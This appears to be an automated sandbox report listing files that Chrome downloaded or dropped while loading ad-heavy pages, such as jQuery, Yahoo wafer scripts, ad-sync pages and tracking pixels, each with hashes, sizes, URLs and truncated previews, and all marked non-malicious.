                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3iuQlq2TtwcbF6IlJ+Knosw+wTzW9LxXUJsb5vaU8ZW:Shl1bF6IlJ+Kf9dE8oU8ZW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA320D39602C7372E993ED8CA6026A92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E450CBC300424D62D5D40A0716345D0EA1A7DBD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B28A31976C8BC8B8869AA7367D73636F8462F54A42EDD9EB00C28DCAF1FDD7C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F46A3F8A77CFF2E3C746DA437BF57EDA2997EFE1FE36B083AF076CD8F09160545C2C6D7A5AED521D89612F3815195EDAB8B0930112743E80FA9BAF1625F4C347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-rapid-1.10.9-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-rapid"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.827023144127105
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:b6HK/jidcdAImRYSSKtHaIzzFMOWPOs4YpGM3RU4N+IfkGB5jODcxslTDpvQ9:b6MidDHdxzzHUOsAMhUifhja6s9g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F6894D3955FB14CDDA30C8EFA49A5096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:94FA4629C716AF0D5A3743F37C56ADFCFDF8F48C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B2F4AB7B90BBA9D8A6A7030DC77051BEFE48AB8F27FED2CFD8ACB2060CE7B8F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:22244597A2A22EC6011765743DDA5E7BA01F9F3A23BA4C8EC9E91158F4E76835BBBD95F04CD65D18B6CD41C5B1B130971641298F9F2C00C54CE611C62F4E3232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/3957.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL........................................."...................................... ................................ .................... ..!........................................ ....'* ..........."........6..5..2...oW%A8"..2 !.$( &% ..1DD#.l&]U$...*.!E3"%! )# .x...1..4..0..0..0../lI$.& .+..0=6"../.w(..1A>"B+"..+/1!.....7oj&eX%oO%..0..13(!..5kZ%.*;/!..1|u(..1..0../75!../..8M?#../....E%.0]8#J."..4w>%OL#..0.n(..0..).,.+.,YI$.|+he&.F'.o*..0.Q&../..0.Z'.,WQ$..*.R(..4..6b]$.{,.r-....~(.r+.~-.Y).-..1.`*..-..*9*!../..3up(..-R4".m+o]%.^(.-.+..)TB#.b(..0.W(..(.-..2./KI$...../.P'.p,..(..0.g(../.-../.s.....b?$.d(W;#.c+..2...^'....d(....T&.^+.d*..)..).O&../..0.g-.l).u-.p,.z-.g'.,..0.././..0.-..*.^'.d*.-..-tE$.,.-..-.5..*./.y-....w+.{+..,..-.,.NQ....*tRNS..........a..l..]...(.).-....wxA?......U.......IDATX.W.p...].v..6...H...}o%m.v%.&6...w.....CBI...B/.MH.._...%...V..]I..I.F.......^.........'.d...)sd.~x...$plp..:q.~
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11230), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.207546962286139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3ciaumTuQ/2lAg6gA2MZzXanihYZRCq4b8jbcMiISXsrFyOof7:3vmiQhgAfzXancMCqYciFXsrFyv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B29975904D91FE6FF597A7FD5A315391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:79A3373AD0C641BD858221C4B70A995215064AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B2918846CC75BC0BFC18AF81ABF8F0E4F9D30CFD5383639CE07601F4A74684E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:480A454CCED569439C22251D6DBB4300A340A2BBD777E62F90C2634902774F58046AE142848A2AC81276989642AF026A85B6F4F1E19A10B45BE9D7C2FB54A3F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-native-da"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?predirect=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dpbm%26i%3D&gdpr=0&gdprConsent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (38501), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):38505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.14265886683488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:KN3BofrbRmxnJUpMgeX3NUwD+8LTjWiSJ/ZPon120P7PaNkJGY07585CRUezlYFU:q3inRmxGpLASw3TiiSJ/ZPonk0P7PaNb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE926A8ABF57F4EB9CD27B54ADAA2E82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:77F22C6570049EE75775DBD5CDD9DDCF07BCFFA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DD9B4502FCA67868F18565F576D270CC9F5D04033CADA66E570FC85961E386A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A89DCD3339F5BADFD9565C57EC982C4D488DA4F903BF827D8D1590BFB052131D12A4CFE98BE576DA02CA58EB3128DDD4E46B58056AFE374A03FE3D2C110B77B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:if (!window.mraid) {document.write('\x3cdiv id="ad_unit"\x3e');}document.write('\x3cstyle\x3ediv{margin:0;padding:0;}.abgcp{height:15px;padding-right:1px;padding-top:1px;padding-left:9px;padding-bottom:9px;right:0px;top:0px;position:absolute;width:31px;z-index:2147483646;}.abgc{display:block;height:15px;position:absolute;right:1px;top:1px;text-rendering:geometricPrecision;z-index:2147483646;}.abgb{display:inline-block;height:15px;}.abgc,.abgcp,.jar .abgc,.jar .abgcp,.jar .cbb{opacity:1;}.abgc{cursor:pointer;}.cbb{cursor:pointer;height:15px;width:15px;z-index:2147483646;background-color:#ffffff;opacity:0;}.cbb svg{position:absolute;top:0;right:0;height:15px;width:15px;stroke:#00aecd;fill:#00aecd;stroke-width:1.25;}.abgb{position:absolute;right:16px;top:0px;}.cbb{position:absolute;right:0px;top:0px;}.abgs{display:none;height:100%;}.abgl{text-decoration:none;}.abgs svg,.abgb svg{display:inline-block;height:15px;width:auto;vertical-align:top;}.abgc .il-wrap{background-color:#ffffff;height:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://eus.rubiconproject.com/usync.html?p=33across&endpoint=us-east&us_privacy=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjstQ6s9ihsYpu7ofxqUxzE2ubgM16ZM3byiK_U_6upehnkciU1BagC3qe7_gxQyoUTaFpruWH_6E9tB85hlPWIA8p1GoSIEE2KxtB-MXO0GOEDW2UQ4Ij6X3IJAyJgIclcEGaZpWgSzxBUwTHIeiyfsMHB7W3HqiIgE5x620aOTBy6HWm1N7P5eBAhK2bgy1nRaVBw&sig=Cg0ArKJSzL1gR_EMi1zYEAE&id=lidartos&mcvt=5285&p=24,276,114,1004&tm=15780.399999999965&tu=10495.699999999953&mtos=5285,5285,5285,5285,5285&tos=5285,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=19&adk=4039402601&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=2434776301&rst=1728414963428&rpt=10769&isd=0&lsd=0&ec=1&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.975332922691726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:eKOiYwH4MwG8rmlZPkYAFZPk4ZPkkbrNFV3HTG3eWfkAEUVrI2wu:egH38kjAr9BrDV3HTG3eWfkAEU9I2wu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3CA0F7654C9FF6E8D85AD84A646443FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BCBEDEA3AF7270D9BD8F9F0C42A86D8E691022DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F36F73D069FD965128D0C58230EA1089ED88E2A2707D4C61C50F094FEA03253B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:62F2C509E9BF1EBB59FADDFABEF7B717FAFEDD599D882BF2B6FF2B63D92C0BC515437951637AA067FFEA455451AA3F1BBFAFBF8C33DBC96DC36F1CFA2FD58309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:[{"callback_id":"121c4789615a2ad","cpm":0.0378,"adomain":["landrysinc.com"],"creative_id":"354388","creativeId":"354388","width":300,"height":600,"ad":"<html><head></head><body><script type=\"text/javascript\"> let parentWindowAmpContextData = ''; let parentWindowSafeframe = ''; let parentWindowAmp = ''; try { const parentWindow = window.parent; parentWindowAmpContextData = parentWindow.AMP_CONTEXT_DATA; parentWindowSafeframe = parentWindow.$sf; parentWindowAmp = parentWindow.context; } catch (e) { } const ampContextData = window.AMP_CONTEXT_DATA || parentWindowAmpContextData; const sf = window.$sf || parentWindowSafeframe; const regularAmpInfo = window.context || parentWindowAmp; if (!!ampContextData && !sf && !regularAmpInfo) { const scriptElement = document.createElement('script'); scriptElement.src = 'https://tpc.googlesyndication.com/safeframe/1-0-37/js/ext.js'; scriptElement.type = 'text/javascript'; scriptElement.async = 'async'; if (!parentWindowAmpContextData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072991&val=CAESEK_r5jpEZOAAsG4pffHlrH8&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3348)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47481549441775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:tlCSnLj6fPf7vdzZN5vzIuD1zEGghaHu9+xQga:tlCM36PzdzZNgG+mu9+xQr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B0900C97C99D591AF4F5B31558445EED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BDB1AE91FBCE4B27C7138B6CB482A54D55CFB5DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B35CC7C38DD75425F6AFCBA3650F73871CE9A32EDF61A2994618B1E1D1221E6A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FC5349DADD6966BD46AEB6828B0F37C5CFE8CC308E45E0F4AC66BD6A8E5178CE46EFD45D0C1F0E1DB16C136638876495A821DCE752F84D82698527B9B39F97BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/js/r20241003/r20110914/abg_lite.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var p=ca(this);function q(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}} .function da(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}var ea=typeof Object.create==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.883606614609165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
